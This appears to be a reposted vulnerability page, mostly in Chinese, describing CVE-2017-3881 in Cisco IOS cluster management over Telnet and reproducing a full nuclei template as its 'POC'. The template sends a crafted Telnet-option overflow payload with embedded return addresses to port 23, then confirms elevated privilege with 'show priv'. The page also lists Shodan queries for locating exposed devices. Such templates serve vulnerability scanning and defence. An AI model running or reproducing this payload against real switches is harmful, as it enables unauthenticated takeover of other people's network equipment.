Cisco IOS Remote Code Execution Vulnerability

漏洞信息

漏洞名称: Cisco IOS Remote Code Execution Vulnerability

漏洞编号:

  • CVE: CVE-2017-3881

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: 该漏洞影响Cisco IOS和Cisco IOS XE软件中的Cisco集群管理协议(CMP)处理代码,允许未经身份验证的远程攻击者导致受影响设备重新加载或以提升的权限远程执行代码。CMP利用Telnet作为集群成员之间的信号和命令协议。漏洞的成因包括两个因素:(1)未能限制CMP特定的Telnet选项仅用于集群成员之间的内部本地通信,而是接受并处理任何Telnet连接到受影响设备的此类选项;(2)错误处理了格式错误的CMP特定Telnet选项。攻击者可以通过在建立与配置为接受Telnet连接的受影响Cisco设备的Telnet会话时发送格式错误的CMP特定Telnet选项来利用此漏洞。利用此漏洞可能允许攻击者执行任意代码并完全控制设备或导致受影响设备重新加载。受影响的设备包括Catalyst交换机、嵌入式服务2020交换机、增强型第2层EtherSwitch服务模块、增强型第2/3层EtherSwitch服务模块、HP的千兆以太网交换机模块(CGESM)、IE工业以太网交换机、ME 4924-10GE交换机、RF Gateway 10和SM-X第2/3层EtherSwitch服务模块。此漏洞的严重性在于它允许未经身份验证的远程攻击者执行任意代码,可能导致设备完全被控制或服务中断,且无需用户交互即可自动利用。

产品厂商: Cisco

产品名称: Cisco IOS

搜索语法: product:”cisco ios http config”, cpe:”cpe:2.3:o:cisco:ios”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/5288bea871d90346cf385e92ed30c3a5882d37f7/network%2Fcves%2F2017%2FCVE-2017-3881.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53

id: CVE-2017-3881

info:
  name: Cisco IOS 12.2(55)SE11 - Remote Code Execution
  author: dwisiswant0
  severity: critical
  description: |
    A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.
  remediation: Deactivate a telnet connection or employ Access Control Lists (ACLs) to limit access.
  reference:
    - https://github.com/artkond/cisco-rce
    - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
    - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md
    - https://nvd.nist.gov/vuln/detail/CVE-2017-3881
    - http://www.securitytracker.com/id/1038059
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-3881
    cwe-id: CWE-20
    epss-score: 0.94083
    epss-percentile: 0.99893
    cpe: cpe:2.3:o:cisco:ios:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: cisco
    product: ios
    shodan-query:
      - product:"cisco ios http config"
      - cpe:"cpe:2.3:o:cisco:ios"
  tags: cve2017,network,cve,cisco,rce,kev,msf,tcp

tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:23"

    inputs:
      - data: "{{hex_decode('fffa240003')}}CISCO_KITS{{hex_decode('01')}}2:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{{hex_decode('000037b4023d55dc0000999c')}}BBBB{{hex_decode('00e1a9f4')}}CCCCDDDDEEEE{{hex_decode('00067b5c023d55c8')}}FFFFGGGG{{hex_decode('006cb3a000270b94')}}HHHHIIII{{hex_decode('014acf98')}}JJJJKKKKLLLL{{hex_decode('0114e7ec')}}:15:{{hex_decode('fff0')}}"
        read: 1024

      - data: "show priv"
        read: 1024
    read-size: 1024
    matchers:
      - type: word
        words:
          - "Current privilege level is"
# digest: 4a0a00473045022027a392a3f4ae6ca700335ac106802070aee5a351ac084b511a6b865f66cc8753022100fc349039457c6ed1a9b9cb834b5a7e1e2db0d01de5e9930bee77a966ef1a009b:922c64590222798bb761d5b6d8e72950

Github Poc
#projectdiscovery/nuclei-templates:github issues #命令执行
Cisco IOS Remote Code Execution Vulnerability
http://example.com/2025/07/08/github_2850206550/
作者
lianccc
发布于
2025年7月8日
许可协议